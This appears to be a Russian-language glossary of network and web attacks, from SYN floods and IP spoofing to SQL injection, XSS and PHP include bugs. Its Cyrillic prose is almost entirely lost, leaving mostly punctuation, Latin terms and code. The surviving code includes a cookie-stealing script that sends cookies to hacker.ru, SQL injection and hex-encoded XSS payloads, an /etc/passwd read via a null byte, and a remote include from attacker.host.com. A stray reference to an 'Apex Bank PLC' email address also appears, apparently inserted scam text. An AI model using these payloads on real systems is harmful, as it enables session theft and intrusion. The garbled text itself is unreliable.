&~*  *


:
     ,      
  ,      . ,   ,    ,        
     ,   . 

  :      , ..  . 
    , ,     , 
      .    , .. 
            . 
     ,  - 
,       .    
      : 

TCP     ,      ,  
 ,   ,    .  
  .   : -    
    . 

UDP     TCP,      ,   
    ,     .    
 ,  TCP. 

ICMP       . ,   , 
      . 

      ->:    
   SYN- (.. ,     SYN),   
  SYN/ACK- (  ,     
),     ACK-,    
.   ,     
  ,        
   . 

IP        ...,      
0  255. 

MAC     ,    .  : :::::, 
     00  ff 

:    ,     
 (..    ),  IP  0.0.0.0 
 255.255.255.255  IP     ,  
  , ..   (.. ) IP  
.         
. 

TCP/IP           . 

ARP     IP  MAC . 

ARP    ,        IP 
   MAC . 

DNS    ,   DNS   (,  , 
        Internet Explorer)   
  (: yandex.ru)    IP  (: 
23.145.14.155). 

         : 
    (, )  .  
  .   ,    
  ,    ,     
  .   ,     
,      ,    . 
   ,      . 

     ,      
. 

Deface/Defacement ( )     -   - 
(, )   (    ). 

Privileges escalation ( ).    
 ,    , (: , 
 ).   ,  ,  
    . ,      
,    .      
   ,        
 . 

   .     
     .
  

1. Fishing ( ).   .    ,   
   (,     ..)  . 
      ,   . ,  
         - 
.          , 
 -  -  .   ,  
 ,         
   ,      ,  
 ,       ,   .  
,      , , , 
  .  ,     
 ,  .      
     ( ,     
  ).
: ,      .    
,     .     
 ,        .   
         . 

2.       ,   .  
,   ,    - 
 (,  )      
  , , .   ,    , 
    ,         
  .  ,    , 
     .
:   .    ,   
  .   ,      ,  
       ,     
  . 

3. .     .    
    .     
    ,   .    -   
   ,  DDoS ,      
  .     ,   
      ,     
   Windows .    ,  
    .      , 
      http://school8.uriit.ru/people/av/class.html 
     .      
  http://fivt.krgtu.ru/kafedri/mo/site/ANTIVIRUS/pages/02.htm.
:   .    DrWEB  
Kaspersky Anti-Virus (     ),  
   Malware,  Ad-Aware, SpyBot, XSpy.  
            
 .     ,    
 .    ,  ,   . 

4. DoS (Denial of Service    ).    ,  
    ,   ;    
     .      
   - ,     
.  ,     
.   ,  DoS,    ,     
Flood       ,      
   DoS.   , :
1.   ,    ,   
 ,        ,  - 
 .
2.    ,         Flood, 
,   Buffer Overflow.
, DoS     . :  
       Flood . 

5. Flood (  /).    ,   
   DoS,       .   
  (      DDoS Distributed Denial 
of Service.      ),     
      (,   
).         ,     
   , ..  ,   
 . :      , 
, ,      . 
    Flood:
1. SYN Flood        SYN.  , 
        SYN/ACK.   SYN 
 ,            
   .
2. ICMP Flood  Ping Flood     ,   ICMP.   
   ,      ,  
  ( ) .
3. Identification Flood (Ident Flood).   ICMP Flood,     
  113  identd     ,    
.
4. DNS Flood      DNS .   DNS ,  
    ,  ,       
  .  ,      .
5. DDoS DNS     ,       . 
 ,      ,   ,    , 
       (    
). ,     DNS-   ,  
  DNS , ..      DNS,    
     .  ,   ,  
,      .
6. Boink (Bonk, Teardrop)        
 ,      .   
    ,     
   ,     .  
        
   .
7. Pong     ,       ,  
  ,    .     
.
:      ; ,  ,   
 .   ,    
 .  ,     ,  
 .     ( ) 
  . 

6. Smurf (,     TCP-IP ).  
    ,  ,  TCP-IP   
 ,      ,  
, ,  IP . ,      
 .    TCP Smurf, UDP Smurf, ICMP Smurf. 
,      .
:  CISCO   ,    
,       ;   
 . 

7. Ping-of-Death ( Jolt, SSPing)      ,   
  ICMP ,      (64). 
  ,  Windows 95, .      
  Shadow Security Scanner.
:    ,    . 

8. UDP Storm (UDP )      ,      
  UDP ,      - . 
,  37   time       . 
  UDP      ,    
       UDP  .  
     ,   . 
 ,       (, - 
 ).
:     ,   
UDP ,        . 

9. UDP Bomb      UDP     
 .       (,  
 , ).      .
:  . 

10. Land        ,    
   ,   ,      
. (: : 1.1.1.1  111 : 1.1.1.1  111). 
     ,     
.       100%    
. 

11. Mail Bombing (  ).      
 ,          
    .   ,   Flood,    
,     ,    
 ,        
       .  ,  
         ,  
  DoS. ,   ,  ,    
     .
:    . 

12. Sniffing (   ).   ,   
    ,    
   ,          
 .      ,     , 
     ,   ,   
  ,  ,  .   
           
  ,    .    
 ,  TcpDump (  *NIX ), WinDump ( 
Windows,   ),      ,  
Iris.
:    ,  . 

13. IP Hijack (IP ).      ,   
            
 ,          
.   ,     ,  
 ,        . 
     ,   ,   
  ,       ,  
       .   
   ,     ,  
       ,       
        .  
,     ,    
    .
:     , ,  . 
 . 

14. Dummy ARP ( ARP). ARP ,      
IP  MAC  (..  ).    
  ,    ARP       
  ,   IP.    ,   
,   .  ,    ,  
    IP  (      2 
      IP ).
:  ,     MAC   IP, 
  - ARP . 

15. Dummy DNS Server ( DNS ).      
 ,     ,    (.. 
  )    DNS ,     
   DNS .      , 
       ,   
  DNS .        
  . ,         
,       ,    
  .      .  
 ,       ,  DNS 
.
:       . 


16. Fuzzy ().         
,  UDP.     ,    
,    UDP    ,     . 
 ,     .      
   ,  ,      
 .       , .. 
 ,        - 
,    . ,      
   (   UDP),       
  , .. UDP,           
. ..          . 
    ,         .
:        
   . 

17. Puke      ICMP unreachable (  ), 
      .    
 ,   ,  -    
     . 

18. Fake unreachable       ,     
  (unreachable),     ,    
      .     
 .   ,    17,  
   ,   . 

19. IP-Spoofing (   IP ).    
 IP .  ,       
 IP .      IP    
  ,   .      -. 
 ,       ,  
,          
 .          
    .
:    ,   ,    . 
  ,    (    
)        SYN  
ACK,      SYN-   
   (tcp_max_backlog).     SYN-Cookies. 

20. Host spoofing ( ).   ,   
  .    ,     
 ,      .   
    redirect ,   
     .   
       ,   
        .
:         . 
,  ,     (..  )   
  . 

21.  .          
 .   :      (BruteForce) 
   .    , ..    
 ,        ,   
  ,         .. 
  ,     ,      , 
: -- ,       . 
,       ,    , 
    - .  , ,   . 
    ,        
,    .        
 .
:   ,    . 
    .     
  . 

22. Back Connect/Pipes/Reverse (   ).   
,       . ,     
      .    , 
  .    ,      
   .      
  telnet [ip..] [].   ,  
     (   /Shell)  
 . 

23. Software vulnerabilities ( ).     
.    .      
    .       
  .     ,     
  ,     .    
  ,  ,      .
:    ,     -  
     .       
   . 

24. Buffer Overflow ( ).    ,   
 ,            
    ,    .     
,   ,        
 .          
,     .      
 .       , ..   
     ,    , 
  .     
 (andr[at]sandy.ru)         
 .    ,      
   .       .
1.     
2.       
3.        
4.   
5.    
6.      
7.       
8.   
9.    
10.      
11.       
12.   
13.     
14.       
15.        
         : Integer 
Overflow ( ).      
    :     
:    Basic Integer Overflows   Blexim. 

25. Shatter    Windows ,      
.     ,       
:     .   ,    
  Windows,      ,     
 .          
    ,  50.     
   50,    Windows   Messages (). 
   Header (  (,   
 ))      SETTEXT ( )  ( 
 )   .   ,    
   50, , ,    50- , 
      .     . 
      AMD Athlon 64,     
,       . 

26. Nuke (WinNuke  ).    . Windows   
  NetBIOS         . 
     TCP  (137, 138, 139).    
   Windows  .   ,     
 139   OutOfBand   .    
      .    
   ,     Shadow Security Scanner, 
     ,    SSPing. 

27. Cross User Attack ( ).     
 , ..      ,     
 ,  . Squid 2.4  ISA/2000  
    TCP   .   
  HRS ( )    ,     
      . 

28.   CGI.  WWW ()     
      
 . ,  ,  mail.ru   
    CMS (Content Management System   
  ()).       
    ,    
     .     
      CGI . : http://host/cgi-bin/helloworld?type=A*100 
(..  A    100 ).   http://www.opennet.ru/base/sec/linux_sec_guide.txt.html 
   ,       
,      CGI .  
   ,    ,    
     .       
     ,   ,  , 
 ,       . 

29. SQL Injection (SQL ).     
   SQL   ,    
 ,         SQL . 
:   SELECT login, password FROM members where email= $email ; 
 $email    ,     
  .        : my@mail.ru' 
OR login LIKE '%admin%.  ,  SQL  : SELECT 
login, password FROM members where email='my@mail.ru' OR login LIKE '%admin%';. 
 ,     ,  login  
 admin. 

30. HRS (HTTP Resource Splitting)         
  (      XSS),   
   Hijacking Pages, Cross User Defacement, Web Cache 
Poisoning, Browser Cache Poisoning, XSS (  ).    
,  ,   HTTP    -, 
  HRS,   (  )   HTTP 
 (  ,       ).  HTTP  
    ,     
!   ,    ,   
  .       - 
  ,     -   
  (, -  ). !   
 HTTP  (  )   HTTP  ( 
 )!  ,  ,     
   -    ,       
    (  ).    
,     ,     
,  , , cookie  .    
,     HRS,         
  ,          HRS. 

31. Cross User Defacement      ,    
 ,          
.           .  
,        HRS.   
        , IP , 
     -,       
  .      
 . 

32. Web Cache Poisoning     ,    ,  
   .  ,    , 
 ,        
  ,    -.     , 
       .    , 
      ,   
   . 

33. Browser Cache Poisoning.       ,     
.        ,   Web Cache Poisoning,  
  ,      . 

34. Hijacking Pages           
,          , 
 -,  ,     -, 
   .  ,   
  ,   .    
      .   ,  
 TCP     (  ), TCP  
     ( )  TCP   -  
  ( ).  :
1.       (  )   ,  
 -      1   2  ( HRS).
2.           -.
3. -  1   2    .
4.   ,  1           
  .
5.          .     
    ,    .
6.      -   ,     
 2    -.
7.        2       .
8.        2    .
9.         -      .
10.        2  -   ,  
        2 .
11.         . ..   
 ,   ,   .
        ,     
    ,      .  , 
      ,       
  ,    .    
,      , ,  
 ,        . 

35. CSS/XSS (Cross-Site Scripting   ). ,    
 Microsoft ,    Java Script  . 
 , Java ,    ,   . 
  ,        
   . ,      
      cookie   
.          
          
 ,   . , cookie  !    
   : 

Javascript
<script>img = new Image(); img.src=http://hacker.ru/snf.jpg?"+document.cookie;</script>
,       snf.jpg,        
      document.cookie .  , 
 ,   ,    
  (,  ),     cookie, 
         .  
      ,     , 
     (  ,  JPG) .  
    ,     (: photo.jpg )  
 JAVA .     XSS,     
  ,   Java Script   . , 
      . 

36. SiXSS (SQL Injection Cross Site Scripting).    
SQL Injection  XSS, ..    XSS     
SQL Injection.    ,    MySQL   
  ( 0)  . ,  SQL   
,     

Javascript
<script>alert("SiXSS");</script>
 3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E.  
    SQL Injection ,      : www.victim.com/vuln_script.php?vuln_variable=1+union+select+0x3C73637269 
70743E616C6572742822536958535322293B3C2F7363726970743E  ,   
vuln_variable  vuln_script  ,      
  .        SiXSS, 
 ,    .   ,   
 .    ,    
    .    XSS    
 ,   .  ,    
    ,        
          
,        ,   
 . ,    ,      
,      SQL ,  UNION ,   
   :      , 
 . ,  %F1%F1%FB%EB%EA%E0   
 ,       .  ,  
   ,    .  
,        ,  
  ,   SQL    
. ,     ,    
  ,   JAVA.      
.     ,     
   ,        Apex Bank 
PLC ,      apexbnkplcc@yahoo.co.uk ,    
,           
  .        
  ! 

37. SiHRS (SQL Injection HTTP Resource Splitting)     HTTP 
Resource Splitting     SQL Injection.   
,  , ,  ,    SQL   
HTTP ,      HTTP      
SQL  HTTP      Location:   HTTP .  
    - .    
 HTTP ,      SiHRS  
 . 

PHP 
Select HEX('i.php'
Content-Length: 0 

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html></html>'); 
   ,        692E7068700A436F6E74656E742D4C656E6774683A20300D0A0D0A485... 
       ,      
SiXSS. www.victim.com/vuln_script.php?vuln_variable=1+and+2%3d%34+union+select+ 
0x692E7068700A436F6E74656E742D4C656E6774683A20300D0A0D0A485  

38. NULL Byte (  ).       
PERL.   ,  Perl   \0 (HTML  - %00)   
  .    ,     .  
   . ,  Perl :

Perl
$filename = $query->param('filename').'.dat'; open F, $filename; 
,    ,  filename  ,   org ,  
Perl    org.dat,     /etc/passwd%00,  
Perl      /etc/passwd\0.dat.     
   open, ,   ,  \0  
     .dat      /etc/passwd . 

39. Include Bug      .   
            
 include($file);  $file  ,    
,  http://victim.com/news.php?file=somefile. ,  
 include();    somefile.  ,  
     ,     - 
 http://victim.com/news.php?file=/etc/passwd    . 

40. PHP-Include Bug        ,  
     Include Bug,   ,     
,         - ,  
       PHP . ,    
PHP ,    (, , <?   ?>  <?php   ?>) 
   -,      -, 
 . ..         PHP 
Include. ,    

PHP
include($file); 
        $file (  
,     Include Bug).     
,     PHP ,       
.        -    http://victim.com/news.php?file=http://attacker.host.com/php_code.php 
  PHP         -. 

41. Hidden Fields (  ).    , ,  
 .     ,   
 ,     ,     
.      HTML  : 

HTML
<input type="hidden" name="price" value="10">
.
  ,       ,    
     ,    .
:   ,    .&~